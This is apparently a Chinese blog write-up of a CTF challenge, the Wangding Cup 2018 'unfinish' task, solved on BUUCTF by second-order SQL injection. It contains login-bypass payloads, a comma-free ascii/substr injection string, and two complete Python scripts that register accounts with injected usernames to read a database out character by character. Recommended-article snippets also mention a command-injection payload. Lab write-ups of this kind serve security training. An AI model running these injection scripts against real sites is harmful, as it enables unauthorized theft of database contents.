网络安全--网鼎杯2018漏洞复现(二次注入)

已于 2024-02-21 20:44:23 修改
阅读量1k 收藏 4
点赞数 11
分类专栏: 网络安全 文章标签: web安全 安全
于 2024-02-19 01:21:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_68976043/article/details/136161118
版权

 一、环境:在线测试平台

BUUCTF在线评测 (buuoj.cn)

二、进入界面先尝试万能账号

1'or'1'='1'#

换格式 hais1bux1

1@1'or'1'='1'#

 

三、万能的不行那我们就得想注册了,那注册文件是什么呢?不知道那就扫吧

两款工具:(cmd环境下)

dirmap-master、dirsearch-master

auex(我这里使用的是auex):

正常是register.php我这里不知道为什么乱码了?

注册个账号

 发现用户名回显,我们考虑二次注入

 

很明显是二次注入

 

四、如何解决?

在mysql中我们熟知一点是,+可以当做数学运算符 ,比如我们执行

select ‘1’+‘2a’

返回值为空

select '0'+database();

 

当我们用ASCII值来计算时,此时出现库第一位s的ASCII码值

select '0'+ascii(substr(database(),1,1));

五、当我们在题目中用,后发现很明显有过滤 

会nonono!

那到底过滤掉了我们什么字符

写个字典吧!

抓包去试试吧!检测username到底在过滤什么东西

引入我们刚才的字典

 开始尝试,302便是已经跳转了,200是被拦截住还在原网站,很明显我们的,和information是被过滤掉了

单引号我看还能访问应该是误报吧

 

因为题目中过滤掉了逗号,因此用from for来代替

0'+ascii(substr(database() from 1 for 1))+'0;

成功回显管理员第一个字母w,当然后面可以多次注入,最后拼接数据库名为web,表名我们直接就猜flag了,当然你也可以通过mysql默认的sys去进行注入出来因为information被禁用了

自己写的脚本如下:

# -*- coding:utf-8 -*-
"""
@Author: lingchenwudiandexing
@contact: 3131579667@qq.com
@Time: 2024/2/19 1:04
@version: 1.0
"""
import requests
import logging
import re
from time import sleep

# LOG_FORMAT = "%(lineno)d - %(asctime)s - %(levelname)s - %(message)s"
# logging.basicConfig(level=logging.DEBUG, format=LOG_FORMAT)

def search():
    flag = ''
    url = 'http://19f46d59-6746-4dce-84c1-73a67354f6d1.node5.buuoj.cn/'
    url1 = url+'register.php'
    url2 = url+'login.php'
    for i in range(100):
        sleep(0.3)#不加sleep就429了QAQ
        data1 = {"email" : "1234{}@123.com".format(i), "username" : "0'+ascii(substr((select * from flag) from {} for 1))+'0;".format(i), "password" : "123"}
        data2 = {"email" : "1234{}@123.com".format(i), "password" : "123"}
        r1 = requests.post(url1, data=data1)
        r2 = requests.post(url2, data=data2)
        res = re.search(r'<span class="user-name">\s*(\d*)\s*</span>',r2.text)
        res1 = re.search(r'\d+', res.group())
        flag = flag+chr(int(res1.group()))
        print(flag)
    print("final:"+flag)

if __name__ == '__main__':
    search()

官方脚本如下:

import requests
import time
from bs4 import BeautifulSoup       #html解析器

def getDatabase():
    database = ''
    for i in range(10):
        data_database = {
            'username':"0'+ascii(substr((select database()) from "+str(i+1)+" for 1))+'0",
            'password':'admin',
            "email":"admin11@admin.com"+str(i)
        }
        #注册
        requests.post("http://220.249.52.133:36774/register.php",data_database)
        login_data={
            'password':'admin',
            "email":"admin11@admin.com"+str(i)
        }
        response=requests.post("http://220.249.52.133:36774/login.php",login_data)
        html=response.text                  #返回的页面
        soup=BeautifulSoup(html,'html.parser')
        getUsername=soup.find_all('span')[0]#获取用户名
        username=getUsername.text
        if int(username)==0:
            break
        database+=chr(int(username))
    return database

def getFlag():
    flag = ''
    for i in range(40):
        data_flag = {
            'username':"0'+ascii(substr((select * from flag) from "+str(i+1)+" for 1))+'0",
            'password':'admin',
            "email":"admin32@admin.com"+str(i)
        }
        #注册
        requests.post("http://220.249.52.133:36774/register.php",data_flag)
        login_data={
            'password':'admin',
            "email":"admin32@admin.com"+str(i)
        }
        response=requests.post("http://220.249.52.133:36774/login.php",login_data)
        html=response.text                  #返回的页面
        soup=BeautifulSoup(html,'html.parser')
        getUsername=soup.find_all('span')[0]#获取用户名
        username=getUsername.text
        if int(username)==0:
            break
        flag+=chr(int(username))
    return flag

print(getDatabase())
print(getFlag())

 

五、最终答案:

 

 

凌晨五点的星
关注
  • 11
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
SQL注入--二次注入
weixin_44940180的博客
08-07 445
原理 攻击者构造的恶意数据存储在数据库后,恶意数据被读取并进入到SQL查询语句所导致的注入 防御者可能在用户输入恶意数据时对其中的特殊字符进行了转义处理,但在恶意数据插入到数据库时被处理的数据又被还原并存储在数据库中 当Web程序调用存储在数据库中的恶意数据并执行SQL查询时,就发生了SQL二次注入 二次注入,可以概括为以下两步: 第一步:插入恶意数据 进行数据库插入数据时,对其中的特殊字符进行了转义处理,在写入数据库的时候又保留了原来的数据。 第二步:引用恶意数据 开发者默认存入数据库的数据都是安全
BUUCTF-UAF漏洞 pwnable_hacknote
weixin_45441024的博客
05-21 496
BUUCTF-UAF漏洞 pwnable_hacknote 好久不学习pwn了,今天学习突然就开窍了,开心,好像离大神又近了一步 就不静态分析了,直接动态分析 首先创建两个大小为0x80的堆快,结构如图所示,可以看到每个堆块包含了两个部分 然后我们释放这两个堆块,可以看到被存放进了fastbin中 之后我们创建一个payload,0x8个大小的, from pwn import * from LibcSearcher import * def add(size, content): print(
SQL 注入漏洞(十)二次注入
不秃头的程序Yang
06-20 853
1、二次注入原理 1、查看数据库中账号、密码
渗透测试---手把手教你SQL注入(6)---二次注入以及对getshell的总结与补充
weixin_52796034的博客
10-15 472
有的时候,"明面上"无论如何都找不到可利用的注入点,但是在某些场景中,尤其是创建用户并修改密码的过程中,我们可以针对程序的调用过程进行操作-----亦即,在数据库查询的过程中,需要调用已有的数据时,可能存在注入漏洞(刚开始时没有注入点,但当我们人为地递交一些合法的数据后,可以利用这些数据进行注入)
BUUCTFWeb】Exec(命令执行漏洞
qq_70434663的博客
03-02 1046
在根目录中我们发现有一个flag文件,猜测我们的flag就在里面,所以我们需要使用命令来读取flag文件的内容。命令大家可以在网上查看,这里使用的命令是127.0.0.1 & cat /flag(也可以使用127.0.0.1 | cat /flag)了解拼接符后我们先试一下查看目录,发现使用127.0.0.1 && ls执行不了,使用127.0.0.1 & ls有回显。在进入靶场后发现窗口ping,猜测可能是SQL注入,也有可能是命令执行漏洞。命令执行就用命令拼接符执行漏洞命令就行。
2022年第三届“网鼎杯网络安全大赛(白虎组)部分题目附件
09-19
2022年第三届“网鼎杯网络安全大赛(白虎组)部分题目附件 2022年第三届“网鼎杯网络安全大赛(白虎组)部分题目附件 2022年第三届“网鼎杯网络安全大赛(白虎组)部分题目附件 2022年第三届“网鼎杯”网络...
2022年第三届“网鼎杯网络安全大赛(青龙组)部分题目附件
09-19
2022年第三届“网鼎杯网络安全大赛(青龙组)部分题目附件 2022年第三届“网鼎杯网络安全大赛(青龙组)部分题目附件 2022年第三届“网鼎杯网络安全大赛(青龙组)部分题目附件 2022年第三届“网鼎杯”网络...
[网鼎杯 2018]unfinish.md
09-05
[网鼎杯 2018]unfinish.md
2020网鼎杯网络安全夺旗赛半决赛题目源代码
11-29
《2020网鼎杯网络安全夺旗赛半决赛题目源代码详解》 网络安全夺旗赛(Capture The Flag,简称CTF)是一种流行的网络安全竞技活动,旨在检验参赛者在网络安全领域的技能和知识。2020年的“网鼎杯网络安全夺旗赛半...
2020网鼎杯.zip
07-20
网鼎杯】是一项旨在提升网络安全能力的比赛,它涵盖了多种网络安全技术,如逆向工程(Reverse Engineering)、pwn(破解)以及密码学等。 【逆向工程】是一种技术,它涉及分析软件或硬件的功能,以了解其工作原理...
2016 SWPU CTF web4
10-31
2016 SWPU CTF web4 题目的源码压缩包,压缩包地址是:http://web4.08067.me/web/web.zip,如果服务器关了就只有这里有了
buuctf XCTF October 2019 Twice SQL Injection 二次注入原理+题解
AAAAAAAAAAAA66的博客
12-21 2249
这里要吐槽一点XCTF,之前翻题目时发现有道10分的,还是二次注入,还是0人做出,看了write up觉得还挺简单,就想混着写一下,结果0人做出的原因居然是环境打不开。然后在buuctf 平台找到了这道题,所以就试着写下write up。 目录 二次注入 二次注入的成因 二次注入常出现的地方 题解 思路 步骤 二次注入 二次注入的成因 由于开发者为了防御sql注入,使网站对我们输入的恶意语句中的一些重要的关键字进行了转义,使恶意的sql注入无法执行(比如说将单引号转义...
BUUCTF Web CyberPunk WriteUp
柠檬i的博客
07-08 509
CISCN2019 华北赛区 Day1 Web5]CyberPunk 利用文件包含下载文件,审计代码。然后通过SQL二次注入读取系统内flag文件。
一天一道ctf 第50天(二次注入
scrawman的博客
08-09 337
[CISCN2019 华北赛区 Day1 Web5]CyberPunk 查看源代码,可能有文件包含漏洞,直接读取是不行的,要用filter伪协议:?file=php://filter/convert.base64-encode/resource=index.php同样还可以拿到change.php,delete.php,confirm.php的源码。 代码审计,可以发现对SQL注入的参数进行了很严的过滤,但既然是题目肯定会给你造漏洞,就找那些过滤方法不一样的参数就行了。user_name和phone都用
BUUOJweb刷题wp(三)
Theseus_sky的博客
09-15 548
强网杯2019随便注 堆叠注入原理 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入:1; DELETE FROM products服务器端生成的sql语
CTF--二次注入
qq_53142368的博客
06-07 407
二次注入 昨天的博客没写完,今天补充一下发出去 <!-- Debug Info: Duration: 0.59636402130127 s Current Ip: 10.244.80.46 --> 一看到current IP和last IP,就要知道,应该是把我们的IP写刀数据库里了 这样的话 就是修改X-FORWARD-FOR的值进行注入 先输入1,此时我们的current ip就是它,然后我们再次输入currnt ip是2,但是last IP就是1,因为第一次和第二次的IP不一
【复习】BUUCTF:[网鼎杯2018]Unfinish --- python爬虫 + re sql注入,substr二次注入,hex二次注入 不用bool注入点的substr
Zero_Adam的博客
05-04 1125
目录:一、自己做:二、学到的三、 学习WPpython爬虫 + re 尝试(尝试思路,):1. substr思路:最后的payloadhex思路: 一、自己做: 测试,看到用户名有回显,那么就是又一次从数据库中查询数据,可能有SQL注入的可能,然后我在注册用户名的时候,加上了 ',然后就死活注册不了,, 也不给我报错,,我在这里也想了一会,,想不明白 后来想到了,可能是报错,然后就没执行,然后我用了万能密码来的。 用户名:a'1 or '1。 你注册成功后,他就会自动跳转到login.php的。 然后用邮箱
BUUCTF:[XDCTF 2015]filemanager —php代码审计 + 文件上传 + sql闭合语句注入数据库 + 二次注入
Zero_Adam的博客
04-25 666
0、前置知识点: 1. pathinfo()
Welcome to BUUCTF
qq_34702200的博客
04-22 268
踩坑第一天 [HCTF 2018]WarmUp 查看网页源码: <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"&...
2020网鼎杯think java反弹shell出现乱码
最新发布
07-04
2020年"网鼎杯"Think Java中的"反弹壳(reverse shell)"挑战可能涉及到网络编程和编码问题。当尝试创建一个反弹shell时,通常是在服务器上执行一个程序,该程序接收客户端控制台输入并将其作为命令执行,看起来像是从远程主机“反弹”回本地。 如果遇到乱码问题,这可能是由于以下几个原因: 1. 字符编码不匹配:在通信过程中,如果没有正确指定或协商字符编码,可能会导致接收到的数据被解析为非预期的字符集,造成乱码。比如,可能一方使用了UTF-8,而另一方用的是GBK等其他编码。 2. 编程错误:代码中处理输入或输出的地方可能存在对字节流的操作没有正确转换为字符串,未考虑到各种字符编码的问题。 3. 客户端或服务器环境设置:终端、编辑器、服务端的配置文件等可能存在默认字符编码设置,这可能会影响数据传输过程中的编码格式。 解决这个问题的一般步骤包括检查编码设置、统一双方使用的字符编码,以及在读取和写入数据时进行适当的解码和编码处理。 如果你遇到了具体问题,相关问题可能包括:
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值